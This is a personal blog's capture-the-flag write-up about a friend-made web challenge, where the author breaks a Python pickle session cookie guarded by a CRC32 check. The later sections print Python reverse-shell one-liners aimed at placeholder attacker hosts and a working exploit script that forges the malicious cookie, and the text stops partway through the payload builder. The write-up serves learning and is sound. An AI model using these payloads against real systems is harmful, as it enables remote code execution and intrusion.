<!doctype html>
<!--
  Minimal Mistakes Jekyll Theme 4.24.0 by Michael Rose
  Copyright 2013-2020 Michael Rose - mademistakes.com | @mmistakes
  Free for personal and commercial use under the MIT license
  https://github.com/mmistakes/minimal-mistakes/blob/master/LICENSE
-->
<html lang="en" class="no-js">
  <head>
    <meta charset="utf-8">

<!-- begin _includes/seo.html --><title>Capture the Nitro Writeup - Just Still</title>
<meta name="description" content="Free Nitro!">


  <meta name="author" content="Still Hsu">
  
  <meta property="article:author" content="Still Hsu">
  


<meta property="og:type" content="article">
<meta property="og:locale" content="en_US">
<meta property="og:site_name" content="Just Still">
<meta property="og:title" content="Capture the Nitro Writeup">
<meta property="og:url" content="https://stillu.cc/writeup/2020/06/23/capture-the-nitro/">


  <meta property="og:description" content="Free Nitro!">



  <meta property="og:image" content="https://stillu.cc/assets/images/posts/capture-the-nitro/nitro.png">



  <meta name="twitter:site" content="@StillAzureH">
  <meta name="twitter:title" content="Capture the Nitro Writeup">
  <meta name="twitter:description" content="Free Nitro!">
  <meta name="twitter:url" content="https://stillu.cc/writeup/2020/06/23/capture-the-nitro/">

  
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:image" content="https://stillu.cc/assets/images/posts/capture-the-nitro/nitro.png">
  

  



  <meta property="article:published_time" content="2020-06-23T12:00:00+08:00">





  

  


<link rel="canonical" href="https://stillu.cc/writeup/2020/06/23/capture-the-nitro/">




<script type="application/ld+json">
  {
    "@context": "https://schema.org",
    
      "@type": "Person",
      "name": "Still Hsu",
      "url": "https://stillu.cc/"
    
  }
</script>







<!-- end _includes/seo.html -->



  <link href="/feed.xml" type="application/atom+xml" rel="alternate" title="Just Still Feed">


<!-- https://t.co/dKP3o1e -->
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script>
  document.documentElement.className = document.documentElement.className.replace(/\bno-js\b/g, '') + ' js ';
</script>

<!-- For all browsers -->
<link rel="stylesheet" href="/assets/css/main.css">
<link rel="preload" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
<noscript><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css"></noscript>



    <!-- start custom head snippets -->

<!-- insert favicons. use https://realfavicongenerator.net/ -->

<!-- end custom head snippets -->

<link rel="apple-touch-icon" sizes="57x57" href="/assets/icons/apple-icon-57x57.png">
<link rel="apple-touch-icon" sizes="60x60" href="/assets/icons/apple-icon-60x60.png">
<link rel="apple-touch-icon" sizes="72x72" href="/assets/icons/apple-icon-72x72.png">
<link rel="apple-touch-icon" sizes="76x76" href="/assets/icons/apple-icon-76x76.png">
<link rel="apple-touch-icon" sizes="114x114" href="/assets/icons/apple-icon-114x114.png">
<link rel="apple-touch-icon" sizes="120x120" href="/assets/icons/apple-icon-120x120.png">
<link rel="apple-touch-icon" sizes="144x144" href="/assets/icons/apple-icon-144x144.png">
<link rel="apple-touch-icon" sizes="152x152" href="/assets/icons/apple-icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="/assets/icons/apple-icon-180x180.png">
<link rel="icon" type="image/png" sizes="192x192"  href="/assets/icons/android-icon-192x192.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/icons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="96x96" href="/assets/icons/favicon-96x96.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/icons/favicon-16x16.png">
<link rel="manifest" href="/assets/icons/manifest.json">
<meta name="msapplication-TileColor" content="#F21368">
<meta name="msapplication-TileImage" content="/ms-icon-144x144.png">
<meta name="theme-color" content="#F21368">
  </head>

  <body class="layout--single wide">
    <nav class="skip-links">
  <ul>
    <li><a href="#site-nav" class="screen-reader-shortcut">Skip to primary navigation</a></li>
    <li><a href="#main" class="screen-reader-shortcut">Skip to content</a></li>
    <li><a href="#footer" class="screen-reader-shortcut">Skip to footer</a></li>
  </ul>
</nav>

    <!--[if lt IE 9]>
<div class="notice--danger align-center" style="margin: 0;">You are using an <strong>outdated</strong> browser. Please <a href="https://browsehappy.com/">upgrade your browser</a> to improve your experience.</div>
<![endif]-->

    

<div class="masthead">
  <div class="masthead__inner-wrap">
    <div class="masthead__menu">
      <nav id="site-nav" class="greedy-nav">
        
          <a class="site-logo" href="/"><img src="/assets/images/avatar-512.png" alt="Just Still"></a>
        
        <a class="site-title" href="/">
          Just Still
          
        </a>
        <ul class="visible-links"><li class="masthead__menu-item">
              <a href="/about">About</a>
            </li><li class="masthead__menu-item">
              <a href="/categories">Posts</a>
            </li></ul>
        
        <button class="search__toggle" type="button">
          <span class="visually-hidden">Toggle search</span>
          <i class="fas fa-search"></i>
        </button>
        
        <button class="greedy-nav__toggle hidden" type="button">
          <span class="visually-hidden">Toggle menu</span>
          <div class="navicon"></div>
        </button>
        <ul class="hidden-links hidden"></ul>
      </nav>
    </div>
  </div>
</div>


    <div class="initial-content">
      
  







<div class="page__hero--overlay"
  style="background-color: #000; background-image: linear-gradient(rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0.75)), url('/assets/images/posts/capture-the-nitro/nitro.png');"
>
  
    <div class="wrapper">
      <h1 id="page-title" class="page__title" itemprop="headline">
        
          Capture the Nitro Writeup

        
      </h1>
      
        <p class="page__lead">Free Nitro!
</p>
      
      

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2020-06-23T12:00:00+08:00">June 23, 2020</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          4 minute read
        
      </span>
    
  </p>


      
      
    </div>
  
  
</div>




  
    



<nav class="breadcrumbs">
  <ol itemscope itemtype="https://schema.org/BreadcrumbList">
    
    
    
      
        <li itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem">
          <a href="https://stillu.cc/" itemprop="item"><span itemprop="name">Home</span></a>
          <meta itemprop="position" content="1" />
        </li>
        <span class="sep">/</span>
      
      
        
        <li itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem">
          <a href="/categories/#writeup" itemprop="item"><span itemprop="name">Writeup</span></a>
          <meta itemprop="position" content="2" />
        </li>
        <span class="sep">/</span>
      
    
      
      
        
        <li itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem">
          <a href="/categories/#2020" itemprop="item"><span itemprop="name">2020</span></a>
          <meta itemprop="position" content="3" />
        </li>
        <span class="sep">/</span>
      
    
      
      
        
        <li itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem">
          <a href="/categories/#06" itemprop="item"><span itemprop="name">06</span></a>
          <meta itemprop="position" content="4" />
        </li>
        <span class="sep">/</span>
      
    
      
      
        
        <li itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem">
          <a href="/categories/#23" itemprop="item"><span itemprop="name">23</span></a>
          <meta itemprop="position" content="5" />
        </li>
        <span class="sep">/</span>
      
    
      
      
        <li class="current">Capture the Nitro Writeup</li>
      
    
  </ol>
</nav>

  


<div id="main" role="main">
  
  <div class="sidebar sticky">
  


<div itemscope itemtype="https://schema.org/Person">

  
    <div class="author__avatar">
      
        <img src="/assets/images/avatar-512.png" alt="Still Hsu" itemprop="image">
      
    </div>
  

  <div class="author__content">
    
      <h3 class="author__name" itemprop="name">Still Hsu</h3>
    
    
      <div class="author__bio" itemprop="description">
        <p>Developer, photographer, infosec researcher.</p>

      </div>
    
  </div>

  <div class="author__urls-wrapper">
    <button class="btn btn--inverse">Follow</button>
    <ul class="author__urls social-icons">
      
        <li itemprop="homeLocation" itemscope itemtype="https://schema.org/Place">
          <i class="fas fa-fw fa-map-marker-alt" aria-hidden="true"></i> <span itemprop="name">Taiwan</span>
        </li>
      

      
        
          
            <li><a href="https://twitter.com/StillAzureH" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-twitter-square" aria-hidden="true"></i><span class="label">Twitter</span></a></li>
          
        
          
            <li><a href="https://github.com/Still34" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-github" aria-hidden="true"></i><span class="label">GitHub</span></a></li>
          
        
          
            <li><a href="/.well-known/pubkey.asc" rel="nofollow noopener noreferrer"><i class="fas fa-user-lock" aria-hidden="true"></i><span class="label">GPG (Email)</span></a></li>
          
        
      

      

      
        <li>
          <a href="mailto:business@stillu.cc">
            <meta itemprop="email" content="business@stillu.cc" />
            <i class="fas fa-fw fa-envelope-square" aria-hidden="true"></i><span class="label">Email</span>
          </a>
        </li>
      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      <!--
  <li>
    <a href="http://link-to-whatever-social-network.com/user/" itemprop="sameAs" rel="nofollow noopener noreferrer">
      <i class="fas fa-fw" aria-hidden="true"></i> Custom Social Profile Link
    </a>
  </li>
-->
    </ul>
  </div>
</div>

  
  </div>



  <article class="page" itemscope itemtype="https://schema.org/CreativeWork">
    <meta itemprop="headline" content="Capture the Nitro Writeup">
    <meta itemprop="description" content="Free Nitro!">
    <meta itemprop="datePublished" content="2020-06-23T12:00:00+08:00">
    

    <div class="page__inner-wrap">
      

      <section class="page__content" itemprop="text">
        
          <aside class="sidebar__right ">
            <nav class="toc">
              <header><h4 class="nav__title"><i class="fas fa-file-alt"></i> On this page</h4></header>
              <ul class="toc__menu"><li><a href="#official-hints">Official Hints</a></li><li><a href="#login-page">Login Page</a></li><li><a href="#analysis">Analysis</a><ul><li><a href="#breakdown-of-sample-cookie">Breakdown of Sample Cookie</a></li></ul></li><li><a href="#attempts-at-rottening-the-pickle">Attempts at Rottening the Pickle</a><ul><li><a href="#attempt-1---replacing-session_data-with-malicious-pickle">Attempt 1 - Replacing session_data with malicious pickle</a></li><li><a href="#attempt-2---piggybacking-session_data">Attempt 2 - Piggybacking session_data</a></li><li><a href="#attempt-3---packing-our-own-payload-along-with-crc32-hash">Attempt 3 - Packing our own payload along with CRC32 hash</a></li></ul></li><li><a href="#result">Result</a></li></ul>

            </nav>
          </aside>
        
        <p>So the story goes like this: a few weeks ago my friend took notice that I was playing CTF. He got curious and decided to make a little CTF challenge specifically for me. The prize? One month <a href="https://discord.com/nitro">Nitro Classic</a> on Discord. I was like sure, sounds like fun. For the heck of it, I had decided to document my discoveries I made along the way.</p>

<h2 id="official-hints">Official Hints</h2>

<p>The following hints were shown on the front-page:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>🚩🍪👨‍💻🗻🐧🐍🐳👤📁🚫💉
[Ask the shipmaster](https://www.youtube.com/watch?v=ryKD3xgHh1c)
🐳🤫🐱
👤🕊⚕🔑↩
</code></pre></div></div>

<p>My initial guesses when I saw the hint:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">🚩🍪</code>
    <ul>
      <li>Flag is in the cookie?</li>
    </ul>
  </li>
  <li><code class="language-plaintext highlighter-rouge">🗻🐧</code>
    <ul>
      <li>Linux?</li>
      <li>Alpine?</li>
    </ul>
  </li>
  <li><code class="language-plaintext highlighter-rouge">🐍</code>
    <ul>
      <li>Python?</li>
    </ul>
  </li>
  <li><code class="language-plaintext highlighter-rouge">🐳</code>
    <ul>
      <li>Docker?</li>
    </ul>
  </li>
  <li><code class="language-plaintext highlighter-rouge">🚫💉</code>
    <ul>
      <li>Database not injectable?</li>
    </ul>
  </li>
  <li>“This challenge is designed specifically for you.”
    <ul>
      <li><code class="language-plaintext highlighter-rouge">👤🕊⚕</code>/<code class="language-plaintext highlighter-rouge">🔑↩</code></li>
      <li>It turns out this was supposed to be Mercy from Overwatch 🤔, so the credentials were just <code class="language-plaintext highlighter-rouge">mercy</code> and the username reversed.</li>
    </ul>
  </li>
</ul>

<h2 id="login-page">Login Page</h2>

<ul>
  <li>Powered by PHP
    <ul>
      <li><code class="language-plaintext highlighter-rouge">X-Powered-By: PHP/4.4.1-gentoo</code></li>
      <li><code class="language-plaintext highlighter-rouge">Server: Apache/1.3.41 (Unix)</code></li>
      <li>Pages are all suffixed with <code class="language-plaintext highlighter-rouge">.php</code></li>
      <li>…yet the hints suggest otherwise?</li>
    </ul>
  </li>
  <li>Login via POST
    <ul>
      <li>Invalid credential causes <code class="language-plaintext highlighter-rouge">400 Bad Request</code></li>
      <li><img src="/assets/images/posts/capture-the-nitro/400-bad-req.png" alt="" /></li>
    </ul>
  </li>
  <li>CSRF validation
    <ul>
      <li><code class="language-plaintext highlighter-rouge">&lt;input type="hidden" name="xsrf" value=$token /&gt;</code></li>
      <li><code class="language-plaintext highlighter-rouge">Set-Cookie: xsrf_tkv=$token; Path=/</code></li>
    </ul>
  </li>
  <li>Protected by CloudFlare
    <ul>
      <li><code class="language-plaintext highlighter-rouge">Set-Cookie: __cfduid=$cf_id; expires=Tue, 21-Jul-20 15:42:33 GMT; path=/; domain=.&lt;redacted&gt;.com; HttpOnly; SameSite=Lax; Secure</code></li>
    </ul>
  </li>
</ul>

<h2 id="analysis">Analysis</h2>

<ul>
  <li>Database does not appear to be injectable during initial recon</li>
  <li>CSRF token is a Base64-encoded string</li>
  <li>Various hints suggest some parts of the site are not actually PHP
    <ul>
      <li>Python-based?</li>
      <li><code class="language-plaintext highlighter-rouge">pickle.loads</code>?</li>
      <li>Based on the hint, we were able to login as user <code class="language-plaintext highlighter-rouge">mercy</code></li>
      <li>From the cookie structure, it looks like we’re dealing with a Python3 pickled object.</li>
    </ul>
  </li>
</ul>

<h3 id="breakdown-of-sample-cookie">Breakdown of Sample Cookie</h3>

<p>Raw</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gANjYnVpbHRpbnMKZ2V0YXR0cgpxAGNjdG5fYXBwLmxvZ2luCkxvZ2luRGF0YQpxAVgIAAAAdW5yZWR1Y2VxAoZxA1JxBFgFAAAAbWVyY3lxBUdB17w+YYfm94ZxBlJxBy781fa/
</code></pre></div></div>

<p>Decoded</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>\x80\x03cbuiltins\ngetattr\nq\x00cctn_app.login\nLoginData\nq\x01X\x08\x00\x00\x00unreduceq\x02\x86q\x03Rq\x04X\x05\x00\x00\x00mercyq\x05GA\xd7\xbc&gt;a\x87\xe6\xf7\x86q\x06Rq\x07.\xfc\xd5\xf6\xbf
</code></pre></div></div>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">&lt;!-- protocol 03 --&gt;</span>
\x80    \x03
<span class="c">&lt;!-- global string --&gt;</span>
c   builtins\ngetattr\n
<span class="c">&lt;!-- store value --&gt;</span>
q   \x00
<span class="c">&lt;!-- global string --&gt;</span>
c   ctn_app.login\nLoginData\n
<span class="c">&lt;!-- store value --&gt;</span>
q   \x01
<span class="c">&lt;!-- declare unicode of size 0x08 --&gt;</span>
X   \x08\x00\x00\x00unreduce
<span class="c">&lt;!-- store value --&gt;</span>
q   \x02
<span class="c">&lt;!-- tuple2 --&gt;</span>
\x86
<span class="c">&lt;!-- store value --&gt;</span>
q   \x03
<span class="c">&lt;!-- reduce (pop from stack?) --&gt;</span>
R
<span class="c">&lt;!-- store value --&gt;</span>
q   \x04
<span class="c">&lt;!-- declare unicode of size 0x05 --&gt;</span>
<span class="c">&lt;!--     our username --&gt;</span>
X   \x05\x00\x00\x00mercy
<span class="c">&lt;!-- store value --&gt;</span>
q   \x05
<span class="c">&lt;!-- declare float --&gt;</span>
<span class="c">&lt;!--    our login date --&gt;</span>
<span class="c">&lt;!--    how is this float stored??? --&gt;</span>
G   \x41\xd7\xbc\xe3\x61\x87\xe6\xf7
<span class="c">&lt;!-- tuple2 --&gt;</span>
\x86
<span class="c">&lt;!-- store value --&gt;</span>
q   \x06
<span class="c">&lt;!-- reduce (pop from stack?) --&gt;</span>
R
<span class="c">&lt;!-- store value --&gt;</span>
q   \x07
<span class="c">&lt;!-- stop --&gt;</span>
.
<span class="c">&lt;!-- magic number of some sort or hash? --&gt;</span>
<span class="c">&lt;!--     changes every time we re-login --&gt;</span>
<span class="c">&lt;!--     4-byte hash, perhaps CRC32? --&gt;</span>
\xfc\xd5\xf6\xbf
</code></pre></div></div>

<h2 id="attempts-at-rottening-the-pickle">Attempts at Rottening the Pickle</h2>

<h3 id="attempt-1---replacing-session_data-with-malicious-pickle">Attempt 1 - Replacing <code class="language-plaintext highlighter-rouge">session_data</code> with malicious pickle</h3>

<p>Unfortunately, as soon as I tried to do that, the system responded with a tamper detection alert.</p>

<p>Payload:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="s">'((X</span><span class="se">\x06\x00\x00\x00</span><span class="s">pythonX</span><span class="se">\x02\x00\x00\x00</span><span class="s">-cX</span><span class="se">\x8f\x00\x00\x00</span><span class="s">import sys,socket,os,pty;s=socket.socket();s.connect(("IP", PORT));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")lisubprocess</span><span class="se">\n</span><span class="s">Popen</span><span class="se">\n</span><span class="s">.'</span>
</code></pre></div></div>

<p>Disassembled payload:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    0: <span class="o">(</span>    MARK
    1: <span class="o">(</span>        MARK
    2: X            BINUNICODE <span class="s1">'python'</span>
   13: X            BINUNICODE <span class="s1">'-c'</span>
   20: X            BINUNICODE <span class="s1">'import sys,socket,os,pty;s=socket.socket();s.connect(("IP", PORT));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'</span>
  168: l            LIST       <span class="o">(</span>MARK at 1<span class="o">)</span>
  169: i        INST       <span class="s1">'subprocess Popen'</span> <span class="o">(</span>MARK at 0<span class="o">)</span>
  187: <span class="nb">.</span>    STOP
</code></pre></div></div>

<h3 id="attempt-2---piggybacking-session_data">Attempt 2 - Piggybacking <code class="language-plaintext highlighter-rouge">session_data</code></h3>

<p>Next I tried to insert the payload into the session_data before it is terminated by the <code class="language-plaintext highlighter-rouge">. STOP</code> signal. Still no dice apparently.</p>

<p>Payload:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Process session_data by stripping the magic number and putting it back afterwards
</span><span class="n">processed</span> <span class="o">=</span> <span class="n">pickled_session</span><span class="p">[:</span><span class="o">-</span><span class="mi">5</span><span class="p">]</span> <span class="o">+</span> <span class="n">payload</span><span class="p">[:</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span><span class="o">+</span><span class="sa">b</span><span class="s">'R'</span><span class="o">+</span><span class="n">pickled_session</span><span class="p">[</span><span class="o">-</span><span class="mi">5</span><span class="p">:]</span>
<span class="c1"># Output
</span><span class="sa">b</span><span class="s">'</span><span class="se">\x80\x03</span><span class="s">cbuiltins</span><span class="se">\n</span><span class="s">getattr</span><span class="se">\n</span><span class="s">q</span><span class="se">\x00</span><span class="s">cctn_app.login</span><span class="se">\n</span><span class="s">LoginData</span><span class="se">\n</span><span class="s">q</span><span class="se">\x01</span><span class="s">X</span><span class="se">\x08\x00\x00\x00</span><span class="s">unreduceq</span><span class="se">\x02\x86</span><span class="s">q</span><span class="se">\x03</span><span class="s">Rq</span><span class="se">\x04</span><span class="s">X</span><span class="se">\x05\x00\x00\x00</span><span class="s">mercyq</span><span class="se">\x05</span><span class="s">GA</span><span class="se">\xd7\xbc</span><span class="s">@</span><span class="se">\xba\x01\xf8</span><span class="s">j</span><span class="se">\x86</span><span class="s">q</span><span class="se">\x06</span><span class="s">Rq</span><span class="se">\x07</span><span class="s">((X</span><span class="se">\x06\x00\x00\x00</span><span class="s">pythonX</span><span class="se">\x02\x00\x00\x00</span><span class="s">-cX</span><span class="se">\x8f\x00\x00\x00</span><span class="s">import sys,socket,os,pty;s=socket.socket();s.connect(("IP", PORT));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")lisubprocess</span><span class="se">\n</span><span class="s">Popen</span><span class="se">\n</span><span class="s">R.l</span><span class="se">\xa9</span><span class="s">oe'</span>
</code></pre></div></div>

<p>Disassembled payload:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    0: <span class="se">\x</span>80 PROTO      3
    2: c    GLOBAL     <span class="s1">'builtins getattr'</span>
   20: q    BINPUT     0
   22: c    GLOBAL     <span class="s1">'ctn_app.login LoginData'</span>
   47: q    BINPUT     1
   49: X    BINUNICODE <span class="s1">'unreduce'</span>
   62: q    BINPUT     2
   64: <span class="se">\x</span>86 TUPLE2
   65: q    BINPUT     3
   67: R    REDUCE
   68: q    BINPUT     4
   70: X    BINUNICODE <span class="s1">'mercy'</span>
   80: q    BINPUT     5
   82: G    BINFLOAT   1592853224.030787
   91: <span class="se">\x</span>86 TUPLE2
   92: q    BINPUT     6
   94: R    REDUCE
   95: q    BINPUT     7
   97: <span class="o">(</span>    MARK
   98: <span class="o">(</span>        MARK
   99: X            BINUNICODE <span class="s1">'python'</span>
  110: X            BINUNICODE <span class="s1">'-c'</span>
  117: X            BINUNICODE <span class="s1">'import sys,socket,os,pty;s=socket.socket();s.connect(("IP", PORT));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'</span>
  265: l            LIST       <span class="o">(</span>MARK at 98<span class="o">)</span>
  266: i        INST       <span class="s1">'subprocess Popen'</span> <span class="o">(</span>MARK at 97<span class="o">)</span>
  284: R    REDUCE
  285: <span class="nb">.</span>    STOP
</code></pre></div></div>

<h3 id="attempt-3---packing-our-own-payload-along-with-crc32-hash">Attempt 3 - Packing our own payload along with CRC32 hash</h3>

<p>At this point, I’ve figured out the hash at the end of the pickled data is a CRC32 one, as hinted by the ever-changing footer and its 4-byte nature. Now it is just a matter of figuring out how the hash was generated.</p>

<p>After analyzing for a while, it looks like the last 4-byte was indeed the pickled data CRC32 packed in little-endian.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">session_data</span> <span class="o">=</span> <span class="n">session</span><span class="p">.</span><span class="n">cookies</span><span class="p">[</span><span class="s">'session_data'</span><span class="p">]</span>
<span class="n">pickled_session</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="n">b64decode</span><span class="p">(</span><span class="n">session_data</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Pickle:"</span><span class="p">,</span> <span class="n">pickled_session</span><span class="p">)</span>
<span class="k">assert</span> <span class="n">pwn</span><span class="p">.</span><span class="n">pack</span><span class="p">(</span><span class="n">crc32</span><span class="p">(</span><span class="n">pickled_session</span><span class="p">[:</span><span class="o">-</span><span class="mi">4</span><span class="p">]),</span> <span class="n">endianness</span><span class="o">=</span><span class="s">"little"</span><span class="p">)</span> <span class="o">==</span> <span class="n">pickled_session</span><span class="p">[</span><span class="o">-</span><span class="mi">4</span><span class="p">:]</span>
</code></pre></div></div>

<div class="notice--warning">
  
<p>I spent an hour or two trying to figure out why my payloads weren’t working. It turns out I missed 2 important factors:</p>

<ol>
  <li>The system was an Alpine Linux image; in a limited environment, this means <code class="language-plaintext highlighter-rouge">/bin/sh</code> or <code class="language-plaintext highlighter-rouge">/bin/bash</code> may or may not be available, especially the latter. The default shell that is shipped with Alpine is <code class="language-plaintext highlighter-rouge">ash</code>.</li>
  <li><code class="language-plaintext highlighter-rouge">python</code> wasn’t working, as it should be <code class="language-plaintext highlighter-rouge">python3</code> these days.</li>
</ol>


</div>

<p>Finally, the finished payload was the following:</p>

<blockquote>
  <p>main.py</p>
</blockquote>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">requests</span><span class="p">,</span> <span class="n">requests</span><span class="p">.</span><span class="n">cookies</span>
<span class="kn">import</span> <span class="nn">base64</span>
<span class="kn">import</span> <span class="nn">pickle</span><span class="p">,</span> <span class="n">pickletools</span><span class="p">,</span> <span class="n">pickle_exploit</span><span class="p">,</span> <span class="n">pwn</span>
<span class="kn">from</span> <span class="nn">zlib</span> <span class="kn">import</span> <span class="n">crc32</span>

<span class="n">session</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">Session</span><span class="p">()</span>
<span class="n">session</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">"https://ctn.&lt;redacted&gt;.com/login.php"</span><span class="p">)</span>
<span class="n">session</span><span class="p">.</span><span class="n">post</span><span class="p">(</span><span class="s">"https://ctn.&lt;redacted&gt;.com/login.php"</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="p">{</span>
    <span class="s">"username"</span><span class="p">:</span> <span class="s">"mercy"</span><span class="p">,</span>
    <span class="s">"password"</span><span class="p">:</span> <span class="s">"ycrem"</span><span class="p">,</span>
    <span class="s">"xsrf"</span><span class="p">:</span> <span class="n">session</span><span class="p">.</span><span class="n">cookies</span><span class="p">[</span><span class="s">'xsrf_tkv'</span><span class="p">]</span>
<span class="p">})</span>
<span class="n">session_data</span> <span class="o">=</span> <span class="n">session</span><span class="p">.</span><span class="n">cookies</span><span class="p">[</span><span class="s">'session_data'</span><span class="p">]</span>
<span class="n">pickled_session</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="n">b64decode</span><span class="p">(</span><span class="n">session_data</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Pickle:"</span><span class="p">,</span> <span class="n">pickled_session</span><span class="p">)</span>
<span class="k">assert</span> <span class="n">pwn</span><span class="p">.</span><span class="n">pack</span><span class="p">(</span><span class="n">crc32</span><span class="p">(</span><span class="n">pickled_session</span><span class="p">[:</span><span class="o">-</span><span class="mi">4</span><span class="p">]),</span> <span class="n">endianness</span><span class="o">=</span><span class="s">"little"</span><span class="p">)</span> <span class="o">==</span> <span class="n">pickled_session</span><span class="p">[</span><span class="o">-</span><span class="mi">4</span><span class="p">:]</span>
<span class="n">pickletools</span><span class="p">.</span><span class="n">dis</span><span class="p">(</span><span class="n">pickled_session</span><span class="p">)</span>
<span class="n">payload</span> <span class="o">=</span> <span class="n">pickle_exploit</span><span class="p">.</span><span class="n">exploit</span><span class="p">([</span>
    <span class="s">'python3'</span><span class="p">,</span>
    <span class="s">'-c'</span><span class="p">,</span>
    <span class="sa">f</span><span class="s">'import sys,socket,os,pty;s=socket.socket();s.connect(("</span><span class="si">{</span><span class="n">ATTACKER_IP</span><span class="si">}</span><span class="s">", </span><span class="si">{</span><span class="n">ATTACKER_PORT</span><span class="si">}</span><span class="s">));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/ash")'</span>
<span class="p">])</span>
<span class="n">pickletools</span><span class="p">.</span><span class="n">dis</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Payload:"</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>
<span class="n">processed</span> <span class="o">=</span> <span class="n">payload</span><span class="o">+</span><span class="n">pwn</span><span class="p">.</span><span class="n">pack</span><span class="p">(</span><span class="n">crc32</span><span class="p">(</span><span class="n">payload</span><span class="p">),</span> <span class="n">endianness</span><span class="o">=</span><span class="s">"little"</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Payload with CRC32:"</span><span class="p">,</span> <span class="n">processed</span><span class="p">)</span>
<span class="n">processed_cookie</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="n">b64encode</span><span class="p">(</span><span class="n">processed</span><span class="p">).</span><span class="n">decode</span><span class="p">()</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Payload with CRC32 (Base64):"</span><span class="p">,</span> <span class="n">processed_cookie</span><span class="p">)</span>
<span class="n">session</span><span class="p">.</span><span class="n">cookies</span><span class="p">.</span><span class="nb">set</span><span class="p">(</span><span class="s">'session_data'</span><span class="p">,</span> <span class="n">processed_cookie</span><span class="p">)</span>
<span class="n">get</span> <span class="o">=</span> <span class="n">session</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">'https://ctn.&lt;redacted&gt;.com/user.php'</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Server returned:"</span><span class="p">,</span> <span class="n">get</span><span class="p">.</span><span class="n">status_code</span><span class="p">)</span>
</code></pre></div></div>

<blockquote>
  <p>pickle_exploit.py</p>
</blockquote>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">exploit</span><span class="p">(</span><span class="n">command</span><span class="p">):</span>
    <span class="k">assert</span> <span class="nb">type</span><span class="p">(</span><span class="n">command</span><span class="p">)</span> <span class="ow">is</span> <span class="nb">list</span>
    <span class="n">payload_prefix</span> <span class="o">=</span> <span class="sa">b</span><span class="s">'''(('''</span>
    <span class="n">payload_suffix</span> <span class="o">=</span> <span class="sa">b</span><span class="s">'''lisubprocess</span><span class="se">\n</span><span class="s">Popen</span><span class="se">\n</span><span class="s">.'''</span>
    <span class="n">payload_body</span> <span class="o">=</span> <span class="nb">bytes</span><span class="p">()</span>
    <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">command</span><span class="p">:</span>
        <span class="n">payload_body</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"X"</span> <span class="o">+</span> \
            <span class="nb">bytes</span><span class="p">(</span><span class="n">struct</span><span class="p">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"&lt;I"</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">c</span><span class="p">)))</span> <span class="o">+</span> <span class="nb">bytes</span><span class="p">(</span><span class="n">c</span><span class="p">,</span> <span class="n">encoding</span><span class="o">=</span><span class="s">"utf-8"</span><span class="p">)</span>
